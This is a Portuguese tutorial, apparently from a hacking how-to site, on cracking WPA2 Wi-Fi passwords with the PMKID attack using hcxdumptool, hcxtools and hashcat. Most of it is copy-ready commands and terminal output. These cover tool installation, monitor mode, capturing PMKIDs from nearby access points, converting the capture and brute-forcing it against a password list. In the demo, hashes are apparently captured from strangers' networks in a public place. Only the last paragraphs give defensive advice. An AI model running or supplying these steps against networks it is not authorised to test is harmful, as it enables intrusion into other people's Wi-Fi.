Decifrar a senha de redes WPA2 tem sido praticamente o mesmo por muitos anos, mas um ataque mais recente requer menos interação e informações do que as técnicas anteriores e tem a vantagem adicional de ser capaz de direcionar os pontos de acesso sem ninguém conectado. O último ataque contra o PMKID usa Hashcat para quebrar senhas WPA e permite que hackers encontrem redes com senhas fracas mais facilmente.
A maneira antiga de decifrar senhas WPA2
A maneira antiga de crackear WPA2 jÔ existe hÔ algum tempo e envolve a desconexão momentânea de um dispositivo conectado do ponto de acesso que queremos tentar crackear. Isso tem duas desvantagens, que são essenciais para os hackers de Wi-Fi entenderem.
A primeira desvantagem é o requisito de que alguém esteja conectado à rede para atacÔ-la. A senha da rede pode ser fraca e muito fÔcil de quebrar, mas sem um dispositivo conectado para iniciar rapidamente, não hÔ oportunidade de capturar um aperto de mão, portanto, nenhuma chance de tentar quebrÔ-lo.
A segunda desvantagem dessa tÔtica é que ela é barulhenta e legalmente problemÔtica, pois força você a enviar pacotes que desconectam deliberadamente um usuÔrio autorizado de um serviço que ele estÔ pagando para usar. Esse tipo de interferência não autorizada é tecnicamente um ataque de negação de serviço e, se mantido, é equivalente a bloquear uma rede. Isso pode causar problemas e é facilmente detectÔvel por alguns de nossos guias anteriores.
Um novo mƩtodo de quebra de senha
Em vez de depender da interceptação de comunicações bidirecionais entre dispositivos Wi-Fi para tentar quebrar a senha, um invasor pode se comunicar diretamente com um ponto de acesso vulnerÔvel usando o novo método. Em 4 de agosto de 2018, uma postagem no fórum Hashcat detalhou uma nova técnica que aproveita um ataque contra o RSN IE (Robust Security Network Information Element) de um único quadro EAPOL para capturar as informações necessÔrias para tentar um ataque de força bruta.
Semelhante aos ataques anteriores contra WPA, o invasor deve estar próximo Ć rede que deseja atacar. O objetivo serĆ” usar um adaptador de rede sem fio compatĆvel com Kali para capturar as informaƧƵes necessĆ”rias da rede para tentar forƧar a senha bruta. Em vez de usar Aireplay-ng ou Aircrack-ng, usaremos uma nova ferramenta de ataque sem fio para fazer isso chamada hcxtools .
Usando Hcxtools e Hashcat
Hcxdumptool e hcxpcaptool sĆ£o ferramentas escritas para auditoria de Wi-Fi e teste de penetração e nos permitem interagir com redes Wi-Fi próximas para capturar handshakes WPA e hashes PMKID. Funciona de forma semelhante ao Besside-ng , pois requer argumentos mĆnimos para iniciar um ataque a partir da linha de comando, pode ser executado contra alvos especĆficos ou alvos de conveniĆŖncia e pode ser executado rapidamente por SSH em um Raspberry Pi ou outro dispositivo sem um tela.
Depois que o PMKID é capturado, a próxima etapa é carregar o hash no Hashcat e tentar quebrar a senha. à aqui que hcxtools difere de Besside-ng, pois uma etapa de conversão é necessÔria para preparar o arquivo para Hashcat. Usaremos hcxpcaptool para converter nosso arquivo PCAPNG em um Hashcat com o qual possa trabalhar, deixando apenas a etapa de selecionar uma lista robusta de senhas para suas tentativas de força bruta.
Vale ressaltar que nem todas as redes são vulnerÔveis a esse ataque. Por ser um campo opcional adicionado por alguns fabricantes, você não deve esperar sucesso universal com essa técnica. Se você pode capturar o PMKID depende se o fabricante do ponto de acesso lhe fez o favor de incluir um elemento que o inclua, e se você pode quebrar o PMKID capturado depende se a senha subjacente estÔ contida em sua lista de senhas de força bruta . Se nenhuma das condições for atendida, o ataque falharÔ.
O que vocĆŖ precisarĆ”
Para tentar este ataque, vocĆŖ precisarĆ” executar o Kali Linux e ter acesso a um adaptador de rede sem fio que ofereƧa suporte ao modo de monitor e injeção de pacotes. Temos vĆ”rios guias sobre como selecionar um adaptador de rede sem fio compatĆvel abaixo.
AlĆ©m de um adaptador de rede compatĆvel com Kali , certifique-se de ter atualizado e atualizado totalmente o seu sistema. Caso contrĆ”rio, alguns pacotes podem estar desatualizados e causar problemas durante a captura.
Recomendado: o Alfa AWUS036NHA 2,4 GHz
Passo 1Instale Hxctools e Hashcat
Primeiro, vamos instalar as ferramentas de que precisamos. Para baixĆ”-los, digite o seguinte em uma janela de terminal.
~# git clone https://github.com/ZerBea/hcxdumptool.git
Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.
Em seguida, mude para o diretório e conclua a instalação com make e make install .
~# cd hcxdumptool
~/hcxdumptool# make
cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
~/hcxdumptool# make install
cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~
Quando terminar a instalação, passaremos para a instalação do hxctools. Para fazer isso, abra uma nova janela de terminal ou saia do diretório / hexdumptool e instale o hxctools.
~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git
Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.
Em seguida, mude para seu diretório e execute make e make install como antes. Se você receber um erro, tente digitar sudo antes do comando.
~# cd hcxtools
~/hcxtools# make
mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c
~/hcxtools# make install
install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk
Por fim, precisaremos instalar o Hashcat, o que deve ser fĆ”cil, pois estĆ” incluĆdo no repositório Kali Linux por padrĆ£o. Basta digitar o seguinte para instalar a versĆ£o mais recente do Hashcat.
~/hcxtools# cd
~# apt install hashcat
Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.
Com isso concluĆdo, podemos prosseguir para a configuração do adaptador de rede sem fio.
Passo 2Prepare o adaptador de rede sem fio
Depois de conectar seu adaptador de rede sem fio compatĆvel com Kali, vocĆŖ pode encontrar o nome digitando ifconfig ou ip a . Normalmente, ele serĆ” denominado algo como wlan0. O primeiro passo serĆ” colocar o cartĆ£o no modo de monitor sem fio, permitindo-nos ouvir o trĆ”fego Wi-Fi nas proximidades.
Para fazer isso, digite o seguinte comando em uma janela de terminal, substituindo o nome do seu adaptador de rede sem fio por wlan0.
~# airmon-ng start wlan0
Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Agora, seu adaptador de rede sem fio deve ter um nome como "wlan0mon" e estar no modo monitor. VocĆŖ pode confirmar isso executando ifconfig novamente.
etapa 3Use Hxcdump para capturar PMKIDs de redes locais
Agora estamos prontos para capturar os PMKIDs dos dispositivos que queremos tentar atacar. Com nosso adaptador de rede sem fio no modo de monitor como "wlan1mon", executaremos o seguinte comando para iniciar o ataque.
~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1
Dividindo isso, -i informa ao programa qual interface estamos usando, neste caso, wlan1mon. O nome do arquivo no qual salvaremos os resultados pode ser especificado com o argumento -o sinalizador. O canal que queremos fazer a varredura pode ser indicado com o sinalizador -c seguido pelo nĆŗmero do canal a fazer a varredura.
Em nosso comando acima, estamos usando wlan1mon para salvar PMKIDs capturados em um arquivo chamado "galleria.pcapng." Embora você possa especificar outro valor de status , não tive sucesso na captura com nenhum valor, exceto 1 .
warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956
[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
Quando tiver reunido o suficiente, você pode interromper o programa digitando Control-C para encerrar o ataque. Isso deve produzir um arquivo PCAPNG contendo as informações de que precisamos para tentar um ataque de força bruta, mas precisaremos convertê-lo em um formato que o Hashcat possa entender.
Passo 4Use Hxcpcaptool para converter o despejo para Hashcat
Para converter nosso arquivo PCAPNG, usaremos hcxpcaptool com alguns argumentos especificados. Na mesma pasta em que o arquivo .PCAPNG foi salvo, execute o seguinte comando em uma janela de terminal.
~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
Este comando estĆ” dizendo ao hxcpcaptool para usar as informaƧƵes incluĆdas no arquivo para ajudar o Hashcat a entendĆŖ-lo com os sinalizadores -E , -I e -U . O sinalizador -Z Ć© usado para o nome do arquivo recĆ©m-convertido para o Hashcat usar, e a Ćŗltima parte do comando Ć© o arquivo PCAPNG que queremos converter.
A execução do comando deve nos mostrar o seguinte.
summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)
21 PMKID(s) written to galleriahC.16800
Aqui, podemos ver que reunimos 21 PMKIDs em um curto espaƧo de tempo. Agora podemos usar o arquivo "galleriaHC.16800" no Hashcat para tentar quebrar as senhas da rede.
Etapa 5Selecione uma lista de senha e forƧa bruta com Hashcat
Para começar a atacar os hashes que capturamos, precisaremos escolher uma boa lista de senhas. Você pode encontrar vÔrias listas de senhas boas para começar de novo na coleção SecList . Assim que tiver uma lista de senhas, coloque-a na mesma pasta do arquivo .16800 que você acabou de converter e execute o seguinte comando em uma janela de terminal.
~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'
Neste comando, estamos iniciando o Hashcat no modo 16800 , que Ć© para atacar os protocolos de rede WPA-PMKID-PBKDF2. A seguir, especificaremos o nome do arquivo que queremos quebrar, neste caso, "galleriaHC.16800." O sinalizador -a nos informa quais tipos de ataque usar, neste caso, um ataque "direto" e, em seguida, os sinalizadores -w e --kernel-accel = 1 especificam o perfil de carga de trabalho de maior desempenho. Se o seu computador apresentar problemas de desempenho, vocĆŖ pode diminuir o nĆŗmero no argumento -w .
Em seguida, a opção --force ignora quaisquer avisos para prosseguir com o ataque, e a última parte do comando especifica a lista de senhas que estamos usando para tentar forçar bruta os PMKIDs em nosso arquivo, neste caso, chamado "topwifipass. TXT."
hashcat (v4.2.1) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU
Hashes: 21 digests; 21 unique digests, 20 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:
* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Dependendo da velocidade do hardware e do tamanho da lista de senhas, isso pode levar algum tempo para ser concluĆdo. Para ver o status a qualquer momento, vocĆŖ pode pressionar a tecla S para uma atualização.
Etapa 6Interprete os resultados
Conforme o Hashcat é quebrado, você poderÔ verificar conforme ele avança para ver se alguma chave foi recuperada.
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Quando a lista de senhas estiver chegando ao fim, o Hashcat ajustarĆ” automaticamente a carga de trabalho e fornecerĆ” um relatório final quando estiver concluĆdo.
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A
Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018
Se vocĆŖ conseguiu decifrar alguma senha, vocĆŖ as verĆ” aqui. Em nosso teste, nenhum dos PMKIDs que coletamos continha senhas em nossa lista de senhas, portanto, nĆ£o foi possĆvel quebrar nenhum dos hashes. Este provavelmente serĆ” o seu resultado tambĆ©m em qualquer rede com uma senha forte, mas espere ver resultados aqui para redes que usam uma senha fraca.
O PMKID Hashcat Attack torna os ataques por Wi-Fi mais fƔceis
Embora o novo ataque contra senhas de Wi-Fi torne mais fĆ”cil para os hackers tentarem um ataque a um alvo, os mesmos mĆ©todos que eram eficazes contra os tipos anteriores de cracking WPA permanecem eficazes. Se sua rede nem mesmo oferece suporte ao elemento de seguranƧa robusto que contĆ©m o PMKID, esse ataque nĆ£o tem chance de sucesso. VocĆŖ pode auditar sua própria rede com hcxtools para ver se ela Ć© suscetĆvel a esse ataque.
Mesmo que sua rede seja vulnerÔvel, uma senha forte ainda é a melhor defesa contra um invasor que obtenha acesso à sua rede Wi-Fi usando este ou outro ataque de quebra de senha.
Como esses ataques dependem de adivinhar a senha que a rede Wi-Fi estÔ usando, existem duas fontes comuns de adivinhações; A primeira são os usuÔrios que escolhem senhas padrão ou extremamente ruins , como "12345678" ou "senha". Eles serão facilmente quebrados. A segunda fonte de suposições de senha vem de violações de dados que revelam milhões de senhas de usuÔrios reais . Como muitos usuÔrios reutilizam senhas entre diferentes tipos de contas, essas listas tendem a ser muito eficazes para violar redes Wi-Fi.
0 ComentƔrios